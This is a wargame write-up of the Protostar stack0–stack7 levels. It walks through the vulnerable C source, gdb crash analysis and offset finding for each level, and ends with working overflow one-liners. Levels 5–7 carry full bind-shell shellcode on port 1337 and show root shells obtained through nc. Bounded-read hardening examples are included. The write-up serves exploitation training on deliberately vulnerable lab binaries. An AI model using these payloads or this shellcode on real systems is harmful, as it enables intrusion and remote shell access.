
Protostar Stack Write Up

程序员文章站 2024-03-19 00:00:04

Protostar Stack0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

Approach: overflow buffer to change the value of modified.

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable
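The fix for the bug in stack0 is a bounded read. The block below, an added example rather than code from the write-up, models the stack0 frame as a struct so the overwrite of modified can be reproduced deterministically, and puts an fgets()-based replacement beside it that also reports when a line had to be truncated:

```c
#include <stdio.h>
#include <string.h>

/* Model of stack0's frame: 'modified' lies just past the 64-byte buffer,
 * which is exactly what the 68-byte input relies on. Added example. */
struct frame {
    char buffer[64];
    volatile int modified;
};

/* What gets() effectively does: copy every byte with no bound (modelled
 * as a whole-struct memcpy so the overwrite is well defined here). */
int unbounded_read(const char *input, size_t len)
{
    struct frame f = { {0}, 0 };
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, input, len);
    return f.modified;            /* 0x41414141 after 68 'A's */
}

/* Hardened replacement: fgets() bounded by the buffer size, newline stripped,
 * oversized lines drained and reported. Returns 1 if fit, 0 if cut, -1 on EOF. */
int bounded_read(FILE *in, char *buf, size_t cap, int *truncated)
{
    int c;
    *truncated = 0;
    if (!fgets(buf, (int)cap, in)) return -1;
    size_t n = strlen(buf);
    if (n && buf[n - 1] == '\n') { buf[n - 1] = '\0'; return 1; }
    c = fgetc(in);                /* EOF or '\n' here means the line fit */
    if (c == EOF || c == '\n') return 1;
    while (c != EOF && c != '\n') c = fgetc(in);
    *truncated = 1;
    return 0;
}

/* Same input through the hardened reader (a temp file stands in for
 * stdin); returns the value of 'modified' afterwards. */
int hardened_modified_after(const char *input, int *truncated)
{
    struct frame f = { {0}, 0 };
    FILE *in = tmpfile();
    if (!in) return -1;
    fwrite(input, 1, strlen(input), in);
    rewind(in);
    bounded_read(in, f.buffer, sizeof f.buffer, truncated);
    fclose(in);
    return f.modified;            /* still 0: the bounded read cannot reach it */
}
```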

Protostar Stack1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx() */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Approach: overflow buffer to change modified to 0x61626364.

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value

Protostar Stack2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx() */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Approach: overflow buffer to change modified to 0x0d0a0d0a. Since buffer is copied from the environment variable GREENIE, just set that variable.

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

This is the result on my local Ubuntu 16.04.

But inside the protostar VM it fails:

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

It refuses to set a variable like that.

Not satisfied with that, let's try a script.

se.py:

import os

# Set GREENIE from Python instead of the shell, then run the target,
# which inherits the environment.
os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')

$ python se.py 
you have correctly modified the variable

OK.

Protostar Stack3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

Approach: check the security mitigations.

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so all we need is to disassemble and read off win's address, then use the buffer overflow.

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>: push   ebp
   0x08048425 <+1>: mov    ebp,esp
   0x08048427 <+3>: sub    esp,0x18
   0x0804842a <+6>: mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <puts@plt>
   0x08048436 <+18>:    leave  
   0x08048437 <+19>:    ret    
End of assembler dump.

win()'s address is 0x08048424. Write the payload and clear the level:

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

The code is really minimal!
Approach: overflow buffer to crash the program, find the offset at which eip gets overwritten, and put win()'s address there.

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset to overwrite eip is 76.

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

win()'s address is 0x80483f4.

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Approach: check the security mitigations.

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so we should be able to control eip and run shellcode. I found a shell_bind_tcp shellcode, 89 bytes long, listening on port 1337.

Generate a 200-byte test pattern:

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Run it:

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip crashed at 0x41344141 ('AA4A').

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset is 76.

At this point esp is 0xffffcec0, which is also the address we will point eip at. Its contents are:

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

That is 120 bytes long, enough to hold the 89-byte shellcode and still run a NOP sled in front of it. Build the payload: 'A'*76 + shellcode address + shellcode.

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault! Look at the core file:

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

Look at what is stored around 0xffffceff:

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

Our shellcode actually starts at 0xffffcf00, not 0xffffcec0. Fix the payload:

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Still a segmentation fault! Look at the core again:

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

Look at the nearby memory:

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

Notice that the \x00 byte of the return address 0xffffcf00 we set never made it into memory. Got it: the \x00 byte can't be sent this way (the shell drops NUL bytes from the backtick substitution). But I put in 16 NOP bytes, so the return address can be moved forward by anywhere from 1 to 16 bytes, right? Move it by 1: change the return address to 0xffffcf01.

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

Success!

The esp address inside the protostar VM: 0xbffffcc0

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

In the protostar VM I did not run into the mismatch between esp under gdb and in a direct run.

Protostar Stack6

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

The return address is restricted so that it cannot point into the part of the stack we control.
Approach: although restricted, the check only stops getpath's return address from going directly to the shellcode address. We can instead redirect control back to the address of getpath's own ret instruction; at that point, as long as the shellcode address sits at the top of the stack, the restriction is bypassed.

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

This time the offset of getpath()'s return address is 80.

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

The stack pointer is 0xffffceb0, at offset 84.

Build the payload: 'A'*80 + address of the ret instruction + the address ret will return to (the shellcode address, esp+4) + shellcode.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault! Look at the core file:

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

Look at what is stored nearby:

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

Found the problem: our second return address should be 0xffffced4, not 0xffffceb4.

Also, after the 64 consecutive A's, 4 of the A's got replaced. I don't understand this; if any friend passing by knows why, please enlighten me.

Fix the payload:

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc

The above was all done on my local Ubuntu. In the protostar VM, 32 bytes likewise have to be added to the stack pointer address: the esp obtained was 0xbffffd20, so +4 would be 0xbffffd24, but another 32 bytes must be added, giving 0xbffffd44, for it to work.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

I tried running the payload inside gdb and found that within gdb the 32 bytes don't need to be added. Could this be a difference between gdb and running directly on the system?
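The 4 bytes that change after the 64 A's in the "got path" output can be read straight off the dump above: the local ret sits at buffer+64 (0xffffcebc), and getpath() assigns it __builtin_return_address(0) after gets(), so it receives the overwritten return address 0x080484f9 and printf("%s") then prints those bytes in place of four A's. The following frame model, written here as an added example (not code from the write-up), replays that sequence; it assumes the layout shown by the dump, which gcc does not promise in general:

```c
#include <stdint.h>
#include <string.h>

/* Model of getpath()'s frame in stack6, in the order the write-up's memory
 * dump shows it: buffer, then the local 'ret' at buffer+64, 8 bytes of
 * padding, the saved ebp at +76 and the saved return address at +80.
 * Added example; the layout is read off the dump, not promised by gcc. */
struct getpath_frame {
    char buffer[64];
    uint32_t ret;          /* 'unsigned int ret' in the source */
    uint32_t pad[2];
    uint32_t saved_ebp;
    uint32_t return_addr;  /* the word the payload overwrites at offset 80 */
};

/* Replay what getpath() does after the overflow: gets() copies with no
 * bound, then ret = __builtin_return_address(0) stores the (already
 * overwritten) saved return address into the local that follows buffer. */
void simulate_getpath(const char *input, size_t len, struct getpath_frame *f)
{
    memset(f, 0, sizeof *f);
    if (len > sizeof *f) len = sizeof *f;
    memcpy(f, input, len);           /* gets(buffer) */
    f->ret = f->return_addr;         /* ret = __builtin_return_address(0) */
}

/* True when frame bytes 64..67, which printf("got path %s") walks through,
 * now equal the 4 return-address bytes at 80..83. */
int ret_local_mirrors_return_addr(const struct getpath_frame *f)
{
    const unsigned char *p = (const unsigned char *)f;
    return memcmp(p + 64, p + 80, 4) == 0;
}

/* Number of leading frame bytes still equal to the input, i.e. how many
 * A's print before the replaced bytes appear. */
size_t unchanged_prefix(const struct getpath_frame *f, const char *input, size_t len)
{
    const unsigned char *p = (const unsigned char *)f;
    size_t i = 0;
    if (len > sizeof *f) len = sizeof *f;
    while (i < len && p[i] == (unsigned char)input[i]) i++;
    return i;
}
```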

Protostar Stack7

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

Approach: the same solution as stack6.
Address of the ret instruction: 0x08048544
Shellcode start address: 0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

Summary

Failure is not scary; what is scary is not finding out why you failed.
